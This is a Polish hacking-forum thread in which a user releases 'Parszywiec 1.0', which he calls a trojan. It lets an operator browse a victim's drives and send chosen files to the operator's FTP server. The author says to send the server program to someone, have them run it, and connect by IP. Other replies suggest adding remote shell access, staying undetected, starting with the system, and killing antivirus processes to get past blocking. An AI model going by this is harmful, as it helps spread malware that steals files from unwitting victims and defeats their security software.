Parszywiec 1.0

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
FUNKCJĘ
- Przeszukiwanie dysków
- Wysyłanie pliku na FTP

Na razie to mój pierwszy projekt, więc proszę o opinie co można w nim zmienić lub dodać...

Parszywiec działa na porcie 3023, i jak narazie nie dodaje się do rejestru

Program powstał do celów edukacyjnych i nie biorę za jego używanie odpowiedzialności...

POBIERZ

pozdro

EDIT :

I zapomniałem dodać najważniejszego... Server można wysyłać odrazu konfigurację podaje się przed podłączeniem się, aby sie podłączyć trzeba znać IP

PLik ponownie wrzucony razem z kodami źródłowymi
 

Alienzorg

Użytkownik
Dołączył
Wrzesień 25, 2007
Posty
8
napisz jak z tego korzystac poniewaz ja nie za bardzo sie zanm na atkich rzeczach i nie chce czegos spierdzielic:]
 

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
Musisz założyć konto ftp...

Więc, wysyłasz komuś parszywiec_s.exe jak Ta osoba to odpali możesz sie już do niej łączyć(musisz znać ip) przed tym jednak wypełniasz pola "HASŁO FTP","LOGIN FTP","HOST FTP" swoimi tymi danymi... Później klikasz połącz i już wszystko działa, wystarczy, że wybierzesz jakiś dysk w lewym comboBoxsie a następny comboBox zacznie się wypełniać plikami, po tym jak wybierzesz jakiś plik klikasz ściągnij(naciskajcie tylko 1 raz) po chwili już masz ten plik na ftp(w zależności od wielkości pliku)

pozdro
 

Kanciastoporty

Były Moderator
Dołączył
Grudzień 19, 2006
Posty
1137
Apeluje zeby nastepne posty byly z sensem, bo nie chcemy kolejnego 30-sto stronowego tematu. Wiec jezeli chcesz napisac "jak to uzywac", "av krzyczy", "nie dziala mi" etc to sobie daruj
 

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
Jeżeli chcecie mogę dorzucić kody źródłowe, ale to jedne wielki chaos ;p
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Zergi, wydaje mi się że jak dodasz CMD to będzie miodzio., bo można wykonać wiele przydanych operacji dzięki dostępowi do konsoli poleceń. Nie dodawaj żadnych zbędnych funkcji do zabawy co o &*^&^ można potrzeć bo to tylko zwiększy wykrywalność.
@NIŻEJ
Originally posted by Zergi
AV go nie wykrywa, ale "blokuje"
Niektóre av mają wbudowany firewall, filtrują pocztę itp. Mogą po prostu blokować porty. A może jakaś aplikacja działa na tym samym porcie? Musiał byś metodę opracować omijania "bypassing".
Pozdrawiam.
 

EsX

Użytkownik
Dołączył
Czerwiec 21, 2007
Posty
45
pewnie mozesz dorzucic kody zrodlowe
smile.gif
 

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
CMD nie jest problemem... Ale mam inny problem, otóż program często nie chcę się łączyć z innymi kompami i nie wiem za bardzo czym jest to spowodowane ( przez hamachi wszystko ładnie się łączy). I kolejne pytanko co prawda AV go nie wykrywa, ale "blokuje" tzn jak mam włączonego AV to mój kumpel nie może się do mnie podłączyć... Jak go można ominąć?;]

pzdr
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
killowac av poprostu pobierasz liste procesow i jak powiedzmy znajdzie proces pandy to ja skillowac.
 

Reptile ReX

Użytkownik
Dołączył
Maj 15, 2007
Posty
248
No to Tak
smile.gif


Zalety:
+Mało Wykrywalny
+Łatwy w Obsłudze


Wady
-Nie omija Av i FW (narazie ;p)
-Serwer nie uruchamia się przy starcie Systemu
-Bez CMD

Dobra Wystarczy ;p wogle nie przejmuj się tym co ci napisałem ja wiem że się czepiam byle czego ;]
 

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
Nie czepiasz się byle czego ;p bo bez tych funkcji co wymieniłeś w minusach nie można nazwać mojego softu Trojanem ;] teraz trochę będzie przerwy ;p ale parszywiec 1.1 wyjdzie pod QT ;] którego sie teraz uczę ;]
 

/carnage

Użytkownik
Dołączył
Lipiec 2, 2007
Posty
35
Przecież link działa
<
żebyś nie miał większych problemów ze sciągnięciem parszywca podaje bezposredni link do niego Pobierz
sorka dopiero teraz zobaczyłem że autor parszywca edytował post i podał aktualny link o godzinie 12:22.
 

Zergi

Użytkownik
Dołączył
Marzec 12, 2007
Posty
136
W kodach źródłowych jest błąd ;p a dokładniej w kliencie od 152 - 154 nr wersu chyba ;p
Coś teraz patrze i mi parszywiec niezbyt dobrze działa... Nie będę go modyfikował bo na razie nie ma mam czasu na to ;p za to mam nadzieje, że przydadzą wam się przynajmniej kody źródłowe

pozdro
 
Do góry Bottom